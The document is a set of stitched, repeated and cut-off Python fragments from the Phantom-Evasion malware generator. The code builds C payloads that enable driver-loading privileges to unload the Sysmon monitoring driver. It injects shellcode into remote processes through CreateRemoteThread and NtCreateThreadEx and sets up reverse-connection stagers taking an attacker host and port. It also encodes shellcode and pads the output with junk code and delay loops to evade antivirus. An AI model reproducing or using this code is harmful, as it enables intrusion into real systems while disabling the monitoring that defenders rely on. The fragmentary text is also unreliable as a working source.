Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
ModOpt["AdvapiHandle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
Ret_code += "$:EVA\n"
Ret_code += "HANDLE " + RandhToken + ";\n"
if ModOpt["DynImport"] == True:
NdcOPT = varname_creator()
NdcATP = varname_creator()
NdcLPV = varname_creator()
Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"OpenProcessToken\");\n"
Ret_code += "if(" + NdcOPT + "(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
Ret_code += "LUID " + RandLuid + ";\n"
Ret_code += "FARPROC " + NdcLPV + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"LookupPrivilegeValue\");\n"
Ret_code += "if(" + NdcLPV + "(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
Ret_code += "FARPROC " + NdcATP + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"AdjustTokenPrivileges\");\n"
Ret_code += "if(" + NdcATP + "(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"
else:
Ret_code += "if(OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
Ret_code += "LUID " + RandLuid + ";\n"
Ret_code += "if (LookupPrivilegeValue(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
Ret_code += "if(AdjustTokenPrivileges(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"
Ret_code += "FARPROC " + NdcFilterUnload + " = GetProcAddress(GetModuleHandle(\"fltlib.dll\"),\"FilterUnload\");\n"
Ret_code += "HRESULT unload = " + NdcFilterUnload + "(\"SysmonDrv\");}}}\n"
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],False)
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c",Ret_code)
def Win_RemoteThread(ModOpt):
Ret_code = ""
Randhand = varname_creator()
Randresult = varname_creator()
Ret_code += "HANDLE " + Randhand + ";\n"
if ModOpt["ExecMethod"] == "ProcessInject" or ModOpt["ExecMethod"] == "ProcessInjectSR":
Randthread = varname_creator()
Ret_code += "DWORD " + Randthread + ";\n"
if ModOpt["ExecMethod"] == "ProcessInject":
threadval="0"
elif ModOpt["ExecMethod"] == "ProcessInjectSR":
threadval="0x00000004"
if ModOpt["DynImport"] == True:
NdcCreateRemoteThread = varname_creator()
Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
Ret_code += NdcCreateRemoteThread + "(" + ModOpt["ProcHandle"] + ",NULL,0," + ModOpt["Lpvoid2"] + ",NULL," + threadval + ",&"+ Randthread + ");\n"
if ModOpt["ExecMethod"] == "ProcessInjectSR":
ResThread = varname_creator()
NdcResumeThread = varname_creator()
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"ResumeThread\");\n"
Ret_code += "DWORD " + ResThread + " = " + NdcResumeThread + "(" + Randhand + ");\n"
else:
Ret_code += "CreateRemoteThread(" + ModOpt["ProcHandle"] + ",NULL,0," + ModOpt["Lpvoid2"] + ",NULL," + threadval + ",&"+ Randthread + ");\n"
if ModOpt["ExecMethod"] == "ProcessInjectSR":
ResThread = varname_creator()
Ret_code += "DWORD " + ResThread + " = ResumeThread(" + Randhand + ");\n"
elif ModOpt["ExecMethod"] == "NtProcessInject" or ModOpt["ExecMethod"] == "NtProcessInjectSR":
if ModOpt["ExecMethod"] == "NtProcessInject":
threadval="NULL"
elif ModOpt["ExecMethod"] == "NtProcessInjectSR":
threadval="TRUE"
NdcNtCreateThreadEx = varname_creator()
Ret_code += "FARPROC " + NdcNtCreateThreadEx + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"NtCreateThreadEx\");\n"
Ret_code += NdcNtCreateThreadEx + "(&"+ Randhand + ", GENERIC_ALL, NULL," + ModOpt["ProcHandle"] + ", (LPTHREAD_START_ROUTINE)" + ModOpt["Lpvoid2"] + ", NULL, NULL, NULL, NULL, NULL," + threadval + ");"
if ModOpt["ExecMethod"] == "NtProcessInjectSR":
ResThread = varname_creator()
if ModOpt["DynImport"] == True:
NdcResumeThread = varname_creator()
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"ResumeThread\");\n"
Ret_code += "DWORD " + ResThread + " = " + NdcResumeThread + "(" + Randhand + ");\n"
else:
Ret_code += "DWORD " + ResThread + " = ResumeThread(" + Randhand + ");\n"
if ModOpt["DynImport"] == True:
NdcWaitForSingleObj = varname_creator()
Ret_code += "FARPROC " + NdcWaitForSingleObj + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"WaitForSingleObject\");\n"
Ret_code += "DWORD " + Randresult + " = " + NdcWaitForSingleObj + "(" + Randhand + ",-1);\n"
else:
Ret_code += "DWORD " + Randresult + " = WaitForSingleObject(" + Randhand + ",-1);\n"
return Ret_code
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])
Randvarsize = varname_creator()
Randbuff = varname_creator()
Randvar = varname_creator()
Randfunc = varname_creator()
Randversion = varname_creator()
Randwsadata = varname_creator()
Randtarget = varname_creator()
Randsock = varname_creator()
from random import sample
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])
Randpointer1 = varname_creator()
Randpointer2 = varname_creator()
Randbuff = varname_creator()
Randbuffer2 = varname_creator()
Randbool = varname_creator()
Randflag = varname_creator()
Randflag2 = varname_creator()
Randversion = varname_creator()
from usefull import varname_creator from usefull import Junkmathinject from usefull import windows_evasion from usefull import spawn_multiple_process from usefull import close_brackets_multiproc from usefull import CheckForBackslash Lhost = CheckForBackslash(sys.argv[1]) Lport = sys.argv[2] SpawnMultiProc = int(sys.argv[3]) Randvarsize = varname_creator() Randbuff = varname_creator() Randvar = varname_creator() Randversion = varname_creator() Randwsadata = varname_creator() Randtarget = varname_creator() Randsock = varname_creator() RandSocket = varname_creator()
from usefull import windows_evasion from usefull import spawn_multiple_process from usefull import close_brackets_multiproc from usefull import CheckForBackslash PathOrFilename = CheckForBackslash(sys.argv[1]) Procname = sys.argv[2] WaitBeforeCheck = sys.argv[3] Evasion_Junkcode = sys.argv[4] SpawnMultiProc = int(sys.argv[5]) RandBool = varname_creator() RandEntry = varname_creator() RandHandle = varname_creator() Junkcode_01 = Junkmathinject() # Junkcode Junkcode_02 = Junkmathinject() # Junkcode Junkcode_03 = Junkmathinject() # Junkcode Junkcode_04 = Junkmathinject() # Junkcode Junkcode_05 = Junkmathinject() # Junkcode Junkcode_06 = Junkmathinject() # Junkcode Junkcode_07 = Junkmathinject() # Junkcode WinEvasion_01 = windows_evasion() WinEvasion_02 = windows_evasion()
########################################################################################
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import readpayload_exfile
Payload = readpayload_exfile()
Filename = sys.argv[1] #unused
Encryption = sys.argv[2]
Randbufname = varname_creator()
DecodeKit = encoding_manager(Encryption, Payload, Randbufname)
Payload = DecodeKit[0] # encoded shellcode
DecoderStub = DecodeKit[
1] # decoder stub or string = False if decoder is not necessary
Randmem = varname_creator()
Randptr = varname_creator()
Randinj = varname_creator()
Junkcode_01 = Junkmathinject()
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import random, string
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
import usefull
Powershell_payload = sys.argv[1]
Filename = sys.argv[2]
Randvarname = usefull.varname_creator()
Junkcode1 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode2 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode3 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode4 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode5 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode6 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Junkcode7 = usefull.Junkmathinject(str(random.randint(1,12))) # Junkcode
Win_eva1 = usefull.windows_evasion(str(random.randint(1,4)))
Win_eva2 = usefull.windows_evasion(str(random.randint(1,4)))
Win_eva3 = usefull.windows_evasion(str(random.randint(1,4)))
MorphEvasion1 = str(usefull.Polymorph_Multipath_Evasion(str(random.randint(1,6)),Filename))
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])
Randvarsize = varname_creator()
Randbuff = varname_creator()
Randheapvar = varname_creator()
Randvar = varname_creator()
Randversion = varname_creator()
Randwsadata = varname_creator()
Randtarget = varname_creator()
Randsock = varname_creator()
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import encoding_manager
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
Payload = sys.argv[1]
SpawnMultiProc = int(sys.argv[2])
Encryption = sys.argv[3]
Randbufname = varname_creator()
Payload = encoding_manager(Encryption,Payload,Randbufname)
Randlpv = varname_creator()
Randhand = varname_creator()
Randresult = varname_creator()
Randthread = varname_creator()
Oldprot = varname_creator()
Randbool = varname_creator()
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import random
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
import usefull
Pytherpreter = sys.argv[1]
Filename = sys.argv[2]
Randflag = usefull.varname_creator()
Randcounter = usefull.varname_creator()
Randbig = str(random.randint(6000000, 12000000))
Hollow_code = ""
Hollow_code += Randcounter + " = 0\n"
Hollow_code += Randflag + " = 0\n"
Hollow_code += "while " + Randcounter + " < " + Randbig + ":\n"
Hollow_code += " " + Randflag + " += 1\n"
Hollow_code += " if " + Randflag + " == " + Randbig + ":\n"
Hollow_code += " " + Pytherpreter + "\n"
Hollow_code = Hollow_code.encode('utf-8')
with open(Filename, 'wb') as f:
f.write(Hollow_code)
